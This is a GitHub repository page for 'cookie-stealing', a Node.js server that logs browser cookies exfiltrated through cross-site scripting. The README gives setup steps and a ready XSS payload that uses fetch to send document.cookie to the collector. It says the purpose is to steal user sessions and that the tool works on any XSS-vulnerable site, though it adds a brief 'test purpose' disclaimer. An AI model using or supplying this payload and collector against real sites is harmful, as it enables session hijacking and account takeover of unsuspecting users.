Skip to content
/ cookie-stealing Public

An awesome API to collect cookies! His only purpose is to write a ".txt" about every unprotected cookie in detail.

License

MIT license
5 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

ruigomes99/cookie-stealing

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
images
images
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
index.js
index.js
 
 
package-lock.json
package-lock.json
 
 
package.json
package.json
 
 

Repository files navigation

Contributors Forks Stargazers Issues MIT License


Logo

Cookie Stealing

An awesome API to collect cookies!
View Demo · Report Bug · Request Feature

Table of Contents
  1. About The Project
  2. Getting Started
  3. Usage
  4. Roadmap
  5. Contributing
  6. License
  7. Contact

About The Project

There is a lot of tools to view the details of web cookies, but while I was testing XSS in my own personal projects I felt the need to store the cookies in order to steal the session from the user. So, I built this small project. His only purpose is to write a ".txt" about every unprotected cookie in detail.

Built With

Getting Started

Setup Your Workstation

  • Install Node.js and npm to your local workstation

Quick Start

  1. Clone the repository:
git clone https://github.com/ruigomes99/cookie-stealing.git
  1. Change directory:
cd cookie-stealing
  1. Install dependencies:
npm install
  1. Start the server:
npm start
  1. Go at 'http://127.0.0.1:3000' and verify if you receive the "Hello World" message in your browser.

Usage

IMPORTANT: This code is just for test propose and using this in third party websites in order to benefit yourself is punish as a cybersecurity crime.
You can use this code on any website that allows XSS.
You only need to do a GET request like this one:

  <script> fetch('http://127.0.0.1:3000/cookies/' + document.cookie) </script>

This route receives a parameter called 'cookies'. In order to get the unprotected (httpOnly=false) cookies, you only need to use 'document.cookie' inside a <script> tag.
After the GET request, the server will create or update a ".txt" file called cookies in the high-level path of the repository folder.
This "cookies.txt" file contains the timestamp of the request, the origin URL and every unprotected cookie separated with paragraphs.

Roadmap

See the open issues for a list of proposed features (and known issues).

Contributing

Contributions are what make the open source community such an amazing place to be learn, inspire, and create. Any contributions you make are greatly appreciated.

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

License

Distributed under the MIT License. See MIT LICENSE for more information.

Contact

Rui Gomes - GitHub - [email protected]
Project Link: https://github.com/ruigomes99/cookie-stealing

About

An awesome API to collect cookies! His only purpose is to write a ".txt" about every unprotected cookie in detail.

Resources

Readme

License

MIT license
Activity

Stars

5 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages